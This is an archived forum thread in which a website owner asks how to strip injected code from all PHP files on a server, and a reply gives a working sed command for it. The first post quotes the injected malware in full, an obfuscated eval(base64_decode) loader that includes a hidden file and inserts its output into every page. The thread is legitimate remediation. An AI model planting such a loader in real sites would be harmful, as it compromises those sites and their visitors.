The UNIX and Linux Forums  

Go Back   The UNIX and Linux Forums > Top Forums > Shell Programming and Scripting
Delete all injected code recursively Delete all injected code recursively
.
google unix.com

Forums Register Forum RulesLinksAlbums FAQ Members List Calendar Search Today's Posts Mark Forums Read


Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.

More UNIX and Linux Forum Topics You Might Find Helpful
Thread Thread Starter Forum Replies Last Post
recursively delete the text between 2 strings from a file santosh1234 Shell Programming and Scripting 2 12-29-2008 11:01 PM
delete files recursively in the specified directory deepthi.s Shell Programming and Scripting 3 08-13-2008 11:03 PM
delete files older than 5 minutes in directory (recursively) scarfake Shell Programming and Scripting 3 06-13-2008 02:10 AM
Replace spaces recursively prvnrk Shell Programming and Scripting 5 08-31-2007 05:37 AM
How to display directories recursively? jwriter UNIX for Dummies Questions & Answers 5 04-23-2007 04:37 PM

Closed Thread
English Japanese Spanish French German Portuguese Italian Dutch Swedish Russian Norwegian Hungarian Hebrew Danish Bulgarian Greek Powered by Powered by Google
 
LinkBack Thread Tools Search this Thread Rate Thread Display Modes
  #1 (permalink)  
Old 03-24-2009
ISOcrates ISOcrates is offline
Registered User
  
 

Join Date: Mar 2009
Location: Cape Cod, MA
Posts: 2
Unhappy Delete all injected code recursively
Recently all of the php files on my server got injected with some dating site code and I'm trying to get rid of it all at once. I've tried using sed but I don't know how to escape it correctly because I don't really know what I'm doing. Could you guys help me with the syntax?


Code:
find ./* -type f -exec sed -i 's/<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy9odG1sL21vb2RsZWRhdGEvMzYvbW9kZGF0YS9mb3J1bS8xMTUvMTI0OC9tZGxfdXRmLnBocCcpKXtpbmNsdWRlX29uY2UoJy92YXIvd3d3L2h0bWwvbW9vZGxlZGF0YS8zNi9tb2RkYXRhL2ZvcnVtLzExNS8xMjQ4L21kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>//g' {} \;
  #2 (permalink)  
Old 03-24-2009
rubin's Avatar
rubin rubin is offline Forum Advisor  
Registered User
  
 

Join Date: Nov 2007
Posts: 321
I assume you're using GNU sed ( I see -i option ) ... see if this helps:


Code:
find . -type f -exec sed -ri 's!<\?php /\*\*/.*\)\); \?>!!g' {} \;
  #3 (permalink)  
Old 03-24-2009
ISOcrates ISOcrates is offline
Registered User
  
 

Join Date: Mar 2009
Location: Cape Cod, MA
Posts: 2
Worked perfectly, thank you!

Quote:
Originally Posted by rubin View Post
I assume you're using GNU sed ( I see -i option ) ... see if this helps:


Code:
find . -type f -exec sed -ri 's!<\?php /\*\*/.*\)\); \?>!!g' {} \;
Closed Thread

Bookmarks

Tags
sed

« Regexp help -- (a*)(b*|(ab)*) and (a*)((b|ab)*) on "aabab" | Pulling data from a standard comment block - perl »
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes Rate This Thread
Hybrid Mode Hybrid Mode
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT -4. The time now is 02:46 PM.

The UNIX and Linux Forums - Learn UNIX and UNIX Commands RSS Feeds - Contact Us - The UNIX and Linux Forums - Learn UNIX and UNIX Commands - Archive - Top

Powered by: vBulletin, Copyright ©2000 - 2006, Jelsoft Enterprises Limited. Language Translations Powered by .
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
The UNIX and Linux Forums Content Copyright ©1993-2009. All Rights Reserved.Ad Management by RedTyger

Content Relevant URLs by vBSEO 3.2.0